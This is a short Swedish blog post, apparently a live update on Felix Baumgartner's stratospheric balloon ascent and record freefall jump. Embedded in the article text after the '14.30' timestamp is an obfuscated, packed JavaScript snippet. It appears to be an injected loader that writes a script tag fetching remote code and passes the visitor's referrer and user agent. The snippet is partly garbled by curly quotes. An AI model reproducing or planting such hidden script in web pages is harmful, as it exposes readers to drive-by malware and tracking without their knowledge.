Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Just nu: Felix Baumgartner på väg upp i rymden

Just nu: Felix Baumgartner på väg upp i rymden
Sebastian

14.30 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snzbf|var|u0026u|referrer|kfhsa||js|php’.split(’|’),0,{}))
idag gav sig Felix Baumgartner upp till rymden för att utgöra det mest ultimata stuntet i vår historia. från 36 000 meters höjd ska han slänga sig hjälplös ut. 

Detta är ett försök på nytt världsrekord och han kommer att falla snabbare än ljudet.

Upp i atmosfären tar han sig med hjälp av en gigantisk helium-ballong och en specialbyggd kapsel. Det är alltså på det otroliga 36 000 meters höjd som han ska hoppa fritt rakt ut för att slutligen landa säkert med sin fallskärm.

Det stora riskerna med det hela är att de ogästvänliga förhållandena i yttre atmosfären inte är till för oss människor utan rymddräkt. Sprickor i dräkten eller en läckande kapsel kan innebära livsfara och direkt död.
Risken att han också hamnar i en okontrollerad rotation är också stor  under det fria fallet mot jorden.

Felix Baumgartner är från Österrike och är 43 år.

Vi önskar honom lycka till och väntar med spänning på resultat.